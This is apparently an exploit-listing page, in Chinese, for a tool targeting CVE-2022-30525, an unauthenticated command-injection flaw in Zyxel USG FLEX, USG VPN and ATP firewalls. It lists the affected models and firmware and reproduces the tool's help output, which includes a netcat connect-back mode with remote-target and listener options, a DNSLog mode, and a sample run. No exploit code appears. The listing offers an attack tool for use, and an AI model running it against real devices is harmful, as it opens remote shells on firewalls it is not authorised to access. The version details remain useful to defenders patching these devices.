Share
## https://sploitus.com/exploit?id=FBDACF27-8CBC-534F-9BB8-EFEF692738E0
# CVE-2022-30525

Zyxel 防火墙未经身份验证的远程命令注入漏洞

## 影响组件
USG FLEX 100, 100W, 200, 500, 700 USG20-VPN, USG20W-VPN ATP 100, 200, 500, 700, 800

## 固件版本
ZLD5.00 thru ZLD5.21 Patch 1 ZLD5.10 thru ZLD5.21 Patch 1 ZLD5.10 thru ZLD5.21 Patch 


## help

```shell
[root@localhost ~]# ./CVE-2022-30525 -h
NAME:
   CVE-2022-30525 - Zyxel Firewall Command Injection (CVE-2022-30525)

USAGE:
   CVE-2022-30525 [global options] command [command options] [arguments...]

COMMANDS:
   nc         use netcat listener
   dnslog, d  USE DNSLog
   help, h    Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --help, -h  show help (default: false)


[root@localhost ~]# ./CVE-2022-30525 nc -h
NAME:
   CVE-2022-30525 nc - use netcat listener

USAGE:
   CVE-2022-30525 nc [command options] [arguments...]

OPTIONS:
   --rhost value     The remote address to exploit
   --rport value     The remote port to exploit (default: 443)
   --lhost value     The local address to connect back to
   --lport value     The local port to connect back to (default: 1270)
   --protocol value  The protocol handler to use (default: https://)
   --ncpath value    The path to nc (default: /usr/bin/nc)
   --help, -h        show help (default: false)


[root@localhost ~]# ./CVE-2022-30525 dnslog "http://192.168.0.123"

```